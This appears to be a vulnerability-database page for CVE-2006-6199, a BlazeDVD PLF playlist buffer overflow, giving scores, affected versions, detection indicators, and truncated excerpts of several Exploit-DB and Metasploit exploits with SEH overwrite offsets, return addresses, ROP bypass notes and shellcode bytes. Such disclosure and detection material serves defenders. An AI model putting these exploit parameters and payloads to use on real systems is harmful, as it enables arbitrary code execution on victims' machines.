CVE-2006-6199
published 2006-12-01CVE-2006-6199: Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5.0, and possibly earlier, allows remote attackers to execute arbitrary code via a…
PriorityP357high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
65.06%
99.2th percentile
Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5.0, and possibly earlier, allows remote attackers to execute arbitrary code via a long filename in a PLF playlist.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blazevideo | blaze_dvd | — | — |
| blazevideo | hdtv_player | <= 2.1 | — |
| blazevideo | hdtv_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xEB\x06\x90\x90 (short jump / NOP sled SEH overwrite pattern)
bytes↗
\xb8\x15\xd1\x72 (SEH handler overwrite address)
bytes↗
\x41 x 608 (junk buffer padding before SEH overwrite)
bytes↗
0x100101e7 (return address for BlazeDVD 5.1 Metasploit target)
bytes↗
5e 59 c3 (pop esi / pop ecx / ret gadget at 0x100012cd in skinscrollbar)
bytes↗
\xae\x74\x60\x61 (SEH overwrite: ADD ESP,408 # RETN 4 at 0x616074AE)
bytes↗
\x78\x53\xbe\x01 (return address used in BlazeDVD 5.0 PLF exploit)
- →Malicious .PLF playlist files trigger a stack-based buffer overflow in BlazeDVD when opened; detect creation or download of .PLF files containing large repetitive byte sequences (e.g., 600+ bytes of 0x41) followed by SEH overwrite patterns. ↗
- →SEH-based exploitation: look for .PLF files where bytes at offset ~608 contain a short-jump stub (\xEB\x06\x90\x90) immediately followed by a 4-byte return address overwrite. ↗
- →Metasploit module targets BlazeDVD 5.1 with a 6024-byte alphanumeric-upper encoded payload; SEH control occurs at offset 868/872 within the PLF file buffer. ↗
- →The ASLR/DEP bypass exploit for Windows 7 uses ROP gadgets exclusively from non-ASLR modules loaded by BlazeDVD (base addresses 0x61xxxxxx, 0x64xxxxxx, 0x60xxxxxx); presence of these address ranges in a PLF file is a strong indicator of exploitation. ↗
- →The skinscrollbar DLL loaded by BlazeDVD 5.1 contains a pop/pop/ret gadget at 0x100012cd; flag memory searches or ROP chains referencing this address range (0x10000000–0x10018000). ↗
- ·The Metasploit module uses AlphanumUpper encoder with null-byte bad character restriction; payloads containing \x00 will not function correctly. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hg5p-p4fc-5gx2: Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5
ghsa_unreviewed·2022-05-01
CVE-2006-6199 [HIGH] CWE-119 GHSA-hg5p-p4fc-5gx2: Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5
Stack-based buffer overflow in BlazeVideo BlazeDVD Standard and Professional 5.0, and possibly earlier, allows remote attackers to execute arbitrary code via a long filename in a PLF playlist.
GHSA
GHSA-3g98-7fv9-8r7r: Stack-based buffer overflow in BlazeVideo HDTV Player 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6396 [HIGH] CWE-119 GHSA-3g98-7fv9-8r7r: Stack-based buffer overflow in BlazeVideo HDTV Player 2
Stack-based buffer overflow in BlazeVideo HDTV Player 2.1, and possibly earlier, allows remote attackers to execute arbitrary code via a long filename in a PLF playlist, a different product than CVE-2006-6199. NOTE: it was later reported that 3.5 is also affected.
No detection rules found.
Exploit-DB
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
exploitdb·2013-10-28
CVE-2006-6199 BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link:
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file
#########################################################################################
my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x
Exploit-DB
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
exploitdb·2013-07-16
CVE-2006-6199 BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow
---
#!/usr/bin/perl
# BlazeDVD Pro player 6.1 Local stack based buffer overflow
# Author: PuN1sh3r
# Email: [email protected]
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials
$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x
Exploit-DB
BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)
exploitdb·2012-12-31
CVE-2006-6199 BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)
BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass',
'Description' => %q{
This module updates an existing MSF module originally written for BlazeDVD 5.1. The new module
will bypass DEP and ASLR on version 6. The original vulnerability is due to the handling of
specially crafted PLF files. Exploiting this allows us to execute arbitrary code running under
the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic', # Origin
Exploit-DB
BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2006-6199 BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)
BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)
---
##
# $Id: blazedvd_plf.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BlazeDVD 5.1 PLF Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in BlazeDVD 5.1. When
the application is used to open a specially crafted plf file,
a buffer is overwritten allowing for the execution of arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE' , '2006-6199' ],
[ 'OSVD
Exploit-DB
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass)
exploitdb·2010-06-17
CVE-2006-6199 BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass)
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass)
---
#!/usr/bin/python
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7
# Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley
# Download: http://www.blazevideo.com/
# Tested on windows 7 version N - DEP = AlwaysOn
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Greetz to ryujin ! :P
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# This PoC demonstates how we can bypass ASLR by stealing a
# pointer off the stack and calculating the offset.
# Then setup the VirtualProtect() call and execute it to bypass DE
Exploit-DB
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
exploitdb·2009-08-04
CVE-2009-0450 BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by ThE g0bL!N
#THNX: His0k4 Wahdo :)
#BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0 /(.PLF File) Universal Buffer Overflow Exploit (SEH)
##################################################################
my $bof="x41" x 608;
my $nsh="xEBx06x90x90";
my $seh="x71xFBx32x60" ;# Universal Address
my $nop="x90" x 20;
my $sec=
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x50x42x30x4bx38x45x34x4ex43x4bx48x4ex47".
"x45x30x4ax47x41x50x4fx4ex4bx48x4fx44x4ax41x4bx48".
"x4fx55x42x52x41x3
Exploit-DB
BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)
exploitdb·2009-08-03
CVE-2006-6199 BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)
BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# BlazeDVD 5.1 Professional (.PLF File) Local Buffer Overflow Exploit (SEH)
# ## easy ##
###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team
##AND special THANKS FOR EL7ADRANY ##AND 3ASFH TEAM##
## this work sooooooooo good
## Tested on: Windows XP Pro SP2 (EN)
##################################################################
my $bof="\x41" x 608;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xb8\x15\xd1\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x4
Exploit-DB
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow
exploitdb·2008-08-10
CVE-2006-6199 BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow
---
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/
Exploit-DB
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
exploitdb·2006-12-01
CVE-2009-0450 BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
---
/*
0-day BlazeVideo HDTV Player
30 days of Media Player Exploits by Greg Linares
Discovered and Reported By: Greg Linares [email protected]
Reported Exploit Date: 12/1/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
/* replace it with your own shellco
Metasploit
BlazeDVD 6.1 PLF Buffer Overflow
metasploit
BlazeDVD 6.1 PLF Buffer Overflow
BlazeDVD 6.1 PLF Buffer Overflow
This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/23041http://whitestar.linuxbox.org/pipermail/exploits/2006-December/000065.htmlhttp://www.exploit-db.com/exploits/23783http://www.exploit-db.com/exploits/26889http://www.osvdb.org/30770http://www.securityfocus.com/bid/21337http://www.vupen.com/english/advisories/2006/4764https://exchange.xforce.ibmcloud.com/vulnerabilities/30567https://www.exploit-db.com/exploits/2880http://secunia.com/advisories/23041http://whitestar.linuxbox.org/pipermail/exploits/2006-December/000065.htmlhttp://www.exploit-db.com/exploits/23783http://www.exploit-db.com/exploits/26889http://www.osvdb.org/30770http://www.securityfocus.com/bid/21337http://www.vupen.com/english/advisories/2006/4764https://exchange.xforce.ibmcloud.com/vulnerabilities/30567https://www.exploit-db.com/exploits/2880
2006-12-01
Published